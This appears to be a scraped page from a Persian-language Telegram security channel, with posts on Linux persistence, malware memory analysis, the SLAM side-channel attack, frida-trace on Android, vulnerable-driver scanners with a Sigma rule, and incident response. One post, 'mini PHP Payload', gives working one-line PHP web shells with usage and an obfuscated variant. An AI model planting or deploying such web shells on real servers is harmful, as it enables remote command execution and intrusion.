Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
The Art of Linux Persistence .pdf
6.9 MB
هکر ها چطور در لینوکس دسترسی خود را ماندگار می‌کنند
@Engineer_Computer
🗒 mini PHP Payload

*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Us
age :
Target.com/path/to/shell.php?0=command
*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo
`$_`?>

@Engineer_Computer
ChatGPT for Cybersecurity #4.pdf
2.4 MB
🗒 ChatGPT for Cybersecurity
-|Part 4
قسمت چهارم مقاله ی چت جی پی تی


@Engineer_Computer
رمز نگاری منحنی و بیضوی | Elliptic Curve Cryptography

مترجم: میلاد سقایت

دانلود از سایت academia: کلیک کنید
@Engineer_Computer
Volatility Commands for Basic Malware Analysis.pdf
351.2 KB
دستورات Volatility برای تحلیل بد افزار در حافظه

@Engineer_Computer
یه رایتاپ نچندان فنی ولی جذاب برای مایندست یه هانتر:

https://nmochea.medium.com/a-million-journey-f02df23a2ae7

@Engineer_Computer
⭕️ محققان دانشگاه Vrije در آمستردام هلند یک حمله Side-Channel جدید به نام SLAM را کشف کرده‌اند که می‌تواند برای نشت اطلاعات حساس از حافظه کرنل در CPU های فعلی و آینده ی ‏ Intel , AMD و ARM مورد سوء استفاده قرار گیرد.
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا داده‌های کرنل ASCII دلخواه را به بیرون بکشیم و می‌توان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
‏Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است

@Engineer_Computer
⭕️چگونگی استفاده از frida-trace برای تحلیل داینامیک اپ های اندرویدی در Termux:

توجه: نصب بودن ابزار frida-tools و انتقال فایل فریدا سرور به دایرکتوری زیر الزامی میباشد
/data/local/tmp
پس از انتقال فایل دسترسی 777 داده و ران کنید.


برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد:

توسط پروسس نیم برنامه:
frida-trace -R -J 'path/to/class!methodName' ProcessName
تریس به صورت auto spawn:
frida-trace -R -J 'path/to/class!methodName' -f com.package.name
تریس برنامه توسط pid برنامه:
frida-trace -R -j 'path/to/class!methodName' -p pid
---------------------------------------------------------
برای تریس کردن لایبرری و فانکشن های داخل آن:
تریس به صورت auto spawn:

frida-trace -R -I 'libname.so' -i 'MethodName' -f com.package.name
توسط پروسس نیم برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' ProcessName
تریس برنامه توسط pid برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' -p pid

@Engineer_Computer
🔍 درایورها بخشی جدایی ناپذیر از عملکرد رایانه هستند و آسیب پذیری آنها یا استفاده از درایورهای مخرب می توانند خطرات امنیتی قابل توجهی ایجاد کنند.

⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید.

🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید.

این ابزارها لیست درایورهای مخرب را از
loldrivers.io
گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند.

🔬 اسکنرها

🔬 https://github.com/FourCoreLabs/loldriverscan

🔬 https://github.com/rtfmkiesel/loldrivers-client

🛟 پروژه هش لیست درایور های مخرب شناسایی شده

🛟 https://www.loldrivers.io

🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC

🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml

@Engineer_Computer
1
Roadmap to Become Web3 Developer :

📂 Learn HTML
📂 Learn CSS
📂 Learn JavaScript
📂 Learn React
📂 Learn Solidity
📂 Learn Ether.js
📂 Learn L2
📂 Build Projects
Start Applying for Job’s


@Engineer_Computer
1
This media is not supported in your browser
VIEW IN TELEGRAM
👻 دیپ فیک مستقیماً از وب کم شما.

#هوش_مصنوعی بدون نیاز به دانلود
مدل به طور مستقیم در مرورگر اجرا می شود.


🌐 https://www.fal.ai/camera

@Engineer_Computer
👍2🤯1
مقایسه سه بهروش و استاندارد در کنار هم
@Engineer_Computer
Incident Response Playbook - Dark Web Breaches.pdf
587.3 KB
#IR #Playbook
واکنش به رخداد ها و رخنه ها در دارک وب
@Engineer_Computer